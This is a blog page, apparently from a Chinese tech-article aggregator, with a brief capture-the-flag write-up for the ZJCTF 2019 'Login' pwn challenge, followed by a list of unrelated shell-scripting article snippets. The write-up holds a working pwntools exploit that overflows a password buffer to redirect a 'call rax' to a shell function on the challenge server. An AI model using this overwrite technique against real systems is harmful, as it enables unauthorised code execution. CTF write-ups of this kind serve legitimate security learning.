[ZJCTF 2019]Login

Yyqingmofeige

2020-02-29

exp 脚本

??C++写的程序，逆向分析有点费劲。注意到 password_checker 有 call rax 指令，倒推 rax 的来源，在 main 函数中把 rax 的来源覆盖为漏洞函数的地址即可 get shell

from pwn import *

io = remote('node3.buuoj.cn',27283)

shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))

io.interactive()

感谢 keer 师傅的指点！

shell shell函数 shell脚本

Yyqingmofeige

0 关注 0 粉丝 0 动态

关注关注

详解shell脚本的编写规范

在脚本的开头加注释，说明脚本作者、编写时间、脚本功能，最好可以加上脚本的版本号。shell中脚本注释用#，注释语句和#号之间有一个空格。变量命名要统一规范，shell变量建议使用全部大写，意思清晰明了，如果是多个字符，可以采用下划线进行切割，如APACHE

firefaith 2020-10-30

Linux Shell 如何获取参数的方法

是显示最后命令的退出状态，0表示没有错误，其他表示有错误。不同点：$* 和 $@ 都表示传递给函数或脚本的所有参数，不被双引号(" ")包含时，都以"$1" "$2" …"$n"

以梦为马不负韶华 2020-10-20

详解shell 函数定义与调用

本节程序实现函数定义与调用，注意调用函数是不要使用括号，代码如下：。本节程序实现向被调用函数传递参数，$0是运行该脚本的shell传递的参数从$1开始、传递多个参数是以空格分隔，代码如下：。与$*相同，但是使用时加引号，并在引号中返回每个参数。显示Shel

wangzhaotongalex 2020-09-22

如何复用外部Shell脚本

本文转载自微信公众号「Linux开发那些事儿」，作者LinuxThings。在Linux开发中，经常会编写shell脚本来执行一些任务，通常是一个脚本只做一件事，随着任务的增加，脚本会越来越多，可复用的地方也会逐渐增加，这时就需要提取出脚本中的公共的功能放

jarrygao 2020-11-02

肝！Shell脚本编程的优秀实践

由于工作需要，最近重新开始拾掇shell脚本。虽然绝大部分命令自己平时也经常使用，但是在写成脚本的时候总觉得写的很难看。毕竟shell脚本这个东西不算是正经的编程语言，他更像是一个工具，用来杂糅不同的程序供我们调用。同时，由于历史原因，shell有很多不同

woaimeinuo 2020-10-21

浅谈Shell中的函数

函数可以让我们将一个复杂功能划分成若干模块，让程序结构更加清晰，代码重复利用率更高。像其他编程语言一样，Shell也支持函数。Shell函数必须先定义后使用。可以带function关键字使用function fun_name()来定义，也可以直接给出函数名

laisean 2020-09-01

Shell脚本调用另一个脚本的三种方法

如何在其它Shell脚本中调用first.sh呢？主要有三种方法：source、点号以及sh命令。注意，点号与脚本文件之间记得要有空格。使用source命令和点号.是等价了，类似于C/C++中的#include预处理指令，都是将指定的脚本内容拷贝至当前的脚

libao 2020-09-16

PHP执行普通shell命令流程解析

echo "shell命令{$shell}成功执行";　　注意，system()会将shell命令执行之后，立马显示结果，这一点会比较不方便，因为我们有时候不需要结果立马输出，甚至不需要输出，于是可以用到exec()

卖口粥湛蓝的天空 2020-09-15

自动设置安卓手机wifi代理的PowerShell脚本

在实际测试工作中，经常要将安卓手机通过wifi代理的形式连接到本机的fiddler或charles服务器代理进行抓包测试。最近一直在想，有没有什么方法可以自动设置安卓手机的wifi代理，曾经想通过修改安卓系统配置文件的方式来修改但是没有找到解决方案。最后决

huha 2020-10-16

shell脚本中$符号的命令使用汇总

今天是远程办公的第4天，渐渐的找到了一点在家办公的节奏了，改了几个shell脚本，在改动过程中，发现还有一些知识点需要巩固，这里写出来，加深下印象。关于$符号，大家肯定都不陌生，在shell脚本中，$的作用还是比较大多的，这里将所有的$组合都列出来，大家可

laisean 2020-11-11

shell脚本快速创建、格式化、挂载新添加的磁盘实现方法详解

select W in `ls /dev/sd*|grep -o 'sd[b-z]'|uniq` quit. echo -e "/dev/${W}"1" /data/${W}"1" xfs defaults

大牛牛 2020-10-30

shell之定时周期性执行脚本的方法示例

Select an editor. To change later, run 'select-editor'.注意，新创建的cron作业，不会马上执行，至少要过2分钟才执行。如果重启cron服务则会马上执行。ubuntu默认安装了cron，是开机自启动的。

liguojia 2020-10-20

shell模糊匹配与正则详解

正则可以实现一些简单的功能，并用在脚本中，如检测ip地址是否符合规范，检测文件名是否符合规范等等。正则表达式主要是用来描述一个句法规则的模式。其实说的通俗一点，就是利用字符和元字符的组合，对一些符合既定句法的模式进行模糊匹配。它的主要功能是文本查询和字符串

wangzhaotongalex 2020-10-20

shell中set指令的用法详解

set 指令可根据不同的需求来设置当前所使用 shell 的执行方式，同时也可以用来设置或显示 shell 变量的值。当指定某个单一的选项时将设置 shell 的常用特性，如果在选项后使用 -o 参数将打开特殊特性，若是 +o 将关闭相应的特殊特性。而不带

JohnYork 2020-10-16

详解shell中脚本参数传递的两种方式

采用$0,$1,$2..等方式获取脚本命令行传入的参数，值得注意的是，$0获取到的是脚本路径以及脚本名，后面按顺序获取参数，当参数超过10个时，需要使用${10},${11}....才能获取到参数，但是一般很少会超过10个参数的情况。

Julyth 2020-10-16

浅析Linux之bash反弹shell原理

反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作，原因有很多，例如目标是局域网，或者开启防火墙的某些策略等情况，而这时，我们就可以让受害者主动向攻击者发起连接，被控端发起请求到控制端某端口，并将其命令行的输入输出转到控制端，从而实现交互。L

applecarelte 2020-10-16

shell脚本实现公司项目部署交付环境预检查的思路

echo -e "\033[1;32;31m检测到节点umask值非022,将为您执行修改操作！ansible dragon -m shell -a "sed -i 's/^.*umask.*/umask 022/g' /etc/pro

laisean 2020-09-27

一键配置本地yum源的shell脚本

echo "您的光盘未挂载,接下来将自动进行挂载！echo "/dev/sr0 /media/cdrom iso9660 defaults 0 0" >> /etc/fstab. echo &quo

flycappuccino 2020-09-27

shell脚本实现磁盘监控系统

利用shell脚本实现每隔60秒磁盘内存数据监控。echo -n "监控本机IP地址："$xtip. echo "-----磁盘使用情况-----". echo -n "系统磁盘总容量："$cpr

liguojia 2020-09-27

Spring Boot打包不同环境配置与Shell脚本部署

本篇和大家分享的是 Spring Boot 打包并结合 Shell 脚本命令部署，重点在分享一个shell 程序启动工具，希望能便利工作；通常一套程序分为了很多个部署环境：开发，测试，uat，线上等，我们要想对这些环境区分配置文件，可以通过两种方式：。通

流年浅滩 2020-10-23

Sampler：Shell命令执行可视化和告警工具

Sampler是一个用于shell命令执行，可视化和告警的工具。其配置使用的是一个简单的YAML文件。为什么我需要它？你可以直接从终端对任意动态进程进行采样 – 观察数据库中的更改，监控MQ动态消息，触发部署脚本并在完成后获取通知。如果有一种方法可以使用s

liujianhua 2020-10-22

shell脚本定时备份MySQL数据库数据并保留指定时间

公司用到的MySQL数据库，经常有同事通过一顿骚操作把一些关键的配置数据误删，每次恢复都要花上不少时间，于是写了个shell脚本，结合corntab每天凌晨备份数据库，并保留7天。同样的备份脚本也可用于生产环境MySQL数据库定时备份。上述脚本中指定了要备

tufeiax 2020-09-03

区分shell中的反引号、$()和${}

反引号和$()的作用相同，用于命令替换，即完成引用的命令的执行，将其结果替换出来，与变量替换差不多。原本的意图是要在`command2 `command3` `中先将command3替换出来给command2处理，然后再将结果传给command1处理。然而

vvu 2020-09-16

shell规范

[15:43:[emailprotected] myshell]#[[ $file == .txt ]][15:43:[emailprotected] myshell]#echo $?1若作为通配符不要加"",加引号相当于转义。数组定义

Yyqingmofeige 2020-08-18

23、Shell文件包含

像其他语言一样，Shell 也可以包含外部脚本，将外部脚本的内容合并到当前脚本。两种方式的效果相同，简单起见，一般使用点号(.)，但是注意点号(.)和文件名中间有一空格。例如，创建两个脚本，一个是被调用脚本 subscript.sh，内容如下：

zhushixia 2020-08-17

Shell两种for循环对应实现方法解析

　　生产环境中的应用场景：根目录下建立数量不等的目录，挂载不同的硬盘，按sdb-sdn的顺序对应/data2-/datan，就需要for循环嵌套来解决，写成如for i in 1 2 3 ，for j in a b c，1a，2b，3c这样而for循环似乎

xiaonamylove 2020-08-16

安科网

[ZJCTF 2019]Login

Yyqingmofeige

exp 脚本

Yyqingmofeige

相关推荐

详解shell脚本的编写规范

Linux Shell 如何获取参数的方法

详解shell 函数定义与调用

如何复用外部Shell脚本

肝！Shell脚本编程的优秀实践

浅谈Shell中的函数

Shell脚本调用另一个脚本的三种方法

PHP执行普通shell命令流程解析

自动设置安卓手机wifi代理的PowerShell脚本

shell脚本中$符号的命令使用汇总

shell脚本快速创建、格式化、挂载新添加的磁盘实现方法详解

shell之定时周期性执行脚本的方法示例

shell模糊匹配与正则详解

shell中set指令的用法详解

详解shell中脚本参数传递的两种方式

浅析Linux之bash反弹shell原理

shell脚本实现公司项目部署交付环境预检查的思路

一键配置本地yum源的shell脚本

shell脚本实现磁盘监控系统

Spring Boot打包不同环境配置与Shell脚本部署

Sampler：Shell命令执行可视化和告警工具

shell脚本定时备份MySQL数据库数据并保留指定时间

区分shell中的反引号、$()和${}

shell规范

23、Shell文件包含

Shell两种for循环对应实现方法解析

Yyqingmofeige